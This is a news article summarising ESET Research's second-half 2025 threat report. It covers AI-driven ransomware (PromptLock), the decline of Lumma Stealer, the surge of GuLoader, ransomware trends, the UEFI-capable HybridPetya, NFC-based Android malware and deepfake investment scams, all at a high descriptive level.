SAN FRANCISCO (WHN) – The digital shadows are deepening, and attackers are rapidly evolving their tactics, as a new report from ESET Research details a volatile second half of 2025. Forget theoretical threats; AI-driven malware has officially landed, signaling a significant escalation in the cyber arms race.
ESET’s telemetry and expert analysis reveal that AI is no longer just a tool for crafting more convincing phishing emails. It’s now actively generating malicious code. PromptLock, the first identified AI-driven ransomware, can create its own malicious scripts on the fly. This isn’t just an incremental update; it points to a fundamentally new era of threats where the malware itself can adapt its attack vectors dynamically.
The once-dominant Lumma Stealer, which caused widespread disruption in May, saw its influence wane dramatically. Detections plummeted by 86% in H2 2025 compared to the first half. A key distribution vector, the HTML/FakeCaptcha trojan used in ClickFix attacks, has all but disappeared from ESET’s data. This suggests a successful disruption of its infrastructure, but the swift emergence of new threats shows attackers are always looking for their next entry point.
Instead, CloudEyE, also known as GuLoader, has surged. Its presence in ESET telemetry skyrocketed nearly thirtyfold. This malware-as-a-service downloader and cryptor is a critical component in complex attack chains. It’s delivered via email, then used to deploy other malicious payloads, including ransomware and notorious infostealers like Rescoms, Formbook, and Agent Tesla. Its rise highlights the modular and service-oriented nature of today’s cybercrime operations.
The ransomware situation is equally concerning. Victim numbers for 2025 have already surpassed 2024 totals, with ESET Research projecting a 40% year-over-year increase. Akira and Qilin are now the primary players in the ransomware-as-a-service (RaaS) market. Warlock, a less prominent newcomer, is reportedly employing novel evasion techniques, underscoring the constant cat-and-mouse game between attackers and defenders. The continued proliferation of EDR killers – tools designed to disable endpoint detection and response systems – shows these security layers remain a significant hurdle for ransomware operators.
A chilling reminder of past devastation, HybridPetya has emerged. This new derivative of the infamous Petya/NotPetya ransomware, uncovered by ESET researchers, can now compromise modern UEFI-based systems. This means even systems with enhanced boot security are vulnerable, harkening back to the destructive capabilities of its predecessors.
On the mobile front, Android users are facing increasing threats via Near Field Communication (NFC). ESET telemetry shows an 87% increase in these attacks. NGate, first detailed by ESET in 2024, has been upgraded with contact stealing capabilities, a move likely intended to build more comprehensive victim profiles for future exploitation. RatOn, a new entrant, combines Remote Access Trojan (RAT) functionalities with NFC relay attacks, a rare but potent combination that demonstrates cybercriminals’ drive to innovate and exploit new attack avenues.
Investment scams, like the Nomani schemes, are also becoming more sophisticated. Attackers are deploying higher-quality deepfakes and AI-generated phishing sites. Their ad campaigns are becoming shorter-lived to evade detection. While ESET observed a slight decline in Nomani scam detections in H2 2025, year-over-year growth still stands at 62%, indicating a persistent and evolving threat to unwary investors.
The sheer speed of adaptation is the core takeaway from ESET’s H2 2025 report. Attackers are not just iterating; they’re leveraging advanced technologies like AI and developing sophisticated techniques to bypass established security measures. The Petya/NotPetya callback with HybridPetya and the AI-driven PromptLock demonstrate a willingness to revisit and enhance past attack methodologies, while the surge in CloudEyE and advanced NFC threats show a clear push into new exploitation territories.